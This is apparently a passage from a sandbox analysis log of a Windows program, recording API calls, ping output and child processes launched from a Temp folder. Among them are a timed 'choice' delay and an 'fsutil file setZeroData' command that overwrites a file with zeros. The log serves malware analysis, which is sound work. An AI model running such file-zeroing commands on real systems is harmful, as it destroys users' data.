16384 [0261.366] _write (in: _FileHandle=1, _Buf=0x67b448*, _MaxCharCount=0x16 | out: _Buf=0x67b448*) returned 22 [0261.366] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0261.366] LocalFree (hMem=0x67b448) returned 0x0 [0261.366] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="ØÀg") returned 0x9 [0261.366] CharToOemBuffA (in: lpszSrc="bytes=32 ", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0261.366] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0261.366] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0261.366] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0261.366] LocalFree (hMem=0x67c0d8) returned 0x0 [0261.366] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x2df66c, nSize=0x0, Arguments=0x2df668 | out: lpBuffer="ØÀg") returned 0x9 [0261.367] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0261.367] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0261.367] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0261.367] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0261.367] LocalFree (hMem=0x67c0d8) returned 0x0 [0261.367] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x2df668, nSize=0x0, Arguments=0x2df664 | out: lpBuffer="ØÀg") returned 0x9 [0261.367] CharToOemBuffA (in: lpszSrc="TTL=128\r\n", lpszDst=0x67c0d8, cchDstLength=0x9 | out: lpszDst="TTL=128\r\n") returned 1 [0261.367] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0261.367] _write (in: _FileHandle=1, _Buf=0x67c0d8*, _MaxCharCount=0x9 | out: _Buf=0x67c0d8*) returned 9 [0261.367] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0261.367] LocalFree (hMem=0x67c0d8) returned 0x0 [0261.367] getnameinfo (in: pSockaddr=0x8a55e0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.7"), SockaddrLength=0x10, pNodeBuffer=0x2df630, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.7", pServiceBuffer=0x0) returned 0 [0261.367] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x2df600, nSize=0x0, Arguments=0x2df5fc | out: lpBuffer="`dh") returned 0x5c [0261.367] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for 127.0.0.7:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x686460, cchDstLength=0x5c | out: lpszDst="\r\nPing statistics for 127.0.0.7:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0261.367] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0261.367] _write (in: _FileHandle=1, _Buf=0x686460*, _MaxCharCount=0x5c | out: _Buf=0x686460*) returned 92 [0261.367] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0261.367] LocalFree (hMem=0x686460) returned 0x0 [0261.367] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x2df610, nSize=0x0, Arguments=0x2df60c | out: lpBuffer="`dh") returned 0x61 [0261.367] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 1ms, Average = 0ms\r\n", lpszDst=0x686460, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 1ms, Average = 0ms\r\n") returned 1 [0261.367] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0261.367] _write (in: _FileHandle=1, _Buf=0x686460*, _MaxCharCount=0x61 | out: _Buf=0x686460*) returned 97 [0261.368] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0261.368] LocalFree (hMem=0x686460) returned 0x0 [0261.368] IcmpCloseHandle (IcmpHandle=0x678c28) returned 1 [0261.370] LocalFree (hMem=0x6833e8) returned 0x0 [0261.370] LocalFree (hMem=0x684168) returned 0x0 [0261.370] WSACleanup () returned 0 [0261.371] exit (_Code=0) Thread: id = 1416 os_tid = 0x68c Thread: id = 1418 os_tid = 0xf34 Thread: id = 1420 os_tid = 0x129c Process: id = "564" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x1c363000" os_pid = "0xc64" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1414 os_tid = 0x994 Thread: id = 1419 os_tid = 0xef4 Thread: id = 1421 os_tid = 0xb34 Thread: id = 1422 os_tid = 0x34c Thread: id = 1423 os_tid = 0xb50 Thread: id = 1424 os_tid = 0x2a8 Thread: id = 1425 os_tid = 0xe34 Process: id = "565" image_name = "choice.exe" filename = "c:\\windows\\syswow64\\choice.exe" page_root = "0x29956000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "562" os_parent_pid = "0xfe8" cmd_line = "choice /C Y /N /D Y /T 3 " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1415 os_tid = 0xe3c Process: id = "566" image_name = "fsutil.exe" filename = "c:\\windows\\syswow64\\fsutil.exe" page_root = "0x1c326000" os_pid = "0x1334" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "561" os_parent_pid = "0xba8" cmd_line = "fsutil file setZeroData offset=0 length=524288 “%s” " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1427 os_tid = 0x13c0